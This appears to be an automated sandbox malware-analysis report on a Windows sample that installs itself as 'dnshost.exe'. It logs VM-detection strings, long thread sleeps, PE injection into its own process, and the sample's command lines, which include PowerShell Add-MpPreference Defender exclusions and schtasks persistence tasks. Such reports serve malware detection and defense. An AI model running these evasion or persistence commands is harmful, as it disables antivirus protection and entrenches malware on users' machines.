Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 1892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nD2ozRD7MN.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dnshost.exe PID: 8060, type: MEMORYSTR

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 13B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 98A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: A8A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: AAD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: BAD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: BF20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: CF20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: DF20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 19B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 33B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 9F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 2550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 8A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 9A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 9C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: AC60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: B070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: C070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 2C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory allocated: 4C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 14D0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 3230000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 1620000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 93F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: A3F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: A5F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: B5F0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: BC00000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: CC00000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: DC00000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 1300000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 2D90000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 1400000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: E90000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 2910000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: EF0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 8C20000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 9C20000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 9E30000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: AE30000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: B240000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: C240000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 3260000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory allocated: 3080000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6536	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1599	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Window / User API: threadDelayed 7761	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Window / User API: threadDelayed 1805	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Window / User API: foregroundWindowGot 711	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Window / User API: foregroundWindowGot 931	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3581
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7912
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1537

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe TID: 6556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe TID: 7384	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe TID: 7332	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 3581 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe TID: 7704	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep count: 7912 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900	Thread sleep count: 1537 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Program Files (x86)\DNS Host\dnshost.exe TID: 7864	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DNS Host\dnshost.exe TID: 8080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DNS Host\dnshost.exe TID: 8132	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.25.dr	Binary or memory string: VMware
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.25.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.25.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.25.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.25.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.25.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.25.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: nD2ozRD7MN.exe, 00000000.00000002.2037006043.0000000007EA0000.00000004.08000000.00040000.00000000.sdmp, nD2ozRD7MN.exe, 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CnJQemUAM1
Source: Amcache.hve.25.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.25.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: nD2ozRD7MN.exe, 00000005.00000002.3555930412.0000000006A80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.25.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.25.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.25.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.25.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.25.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.25.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.25.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.25.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.25.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.25.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.25.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.25.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.25.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.25.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.25.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.25.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files (x86)\DNS Host\dnshost.exe"

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory written: C:\Users\user\Desktop\nD2ozRD7MN.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Memory written: C:\Users\user\Desktop\nD2ozRD7MN.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory written: C:\Program Files (x86)\DNS Host\dnshost.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Memory written: C:\Program Files (x86)\DNS Host\dnshost.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Users\user\Desktop\nD2ozRD7MN.exe "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DNS Host Task" /xml "C:\Users\user\AppData\Local\Temp\tmpC8C1.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process created: C:\Users\user\Desktop\nD2ozRD7MN.exe "C:\Users\user\Desktop\nD2ozRD7MN.exe"	Jump to behavior
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Program Files (x86)\DNS Host\dnshost.exe "C:\Program Files (x86)\DNS Host\dnshost.exe"
Source: C:\Program Files (x86)\DNS Host\dnshost.exe	Process created: C:\Program Files (x86)\DNS Host\dnshost.exe "C:\Program Files (x86)\DNS Host\dnshost.exe"

Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000395A000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000036D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqt
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.000000000356A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReqX\W
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000039CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000039CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLReq
Source: nD2ozRD7MN.exe, 00000005.00000002.3543198585.00000000035F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager$
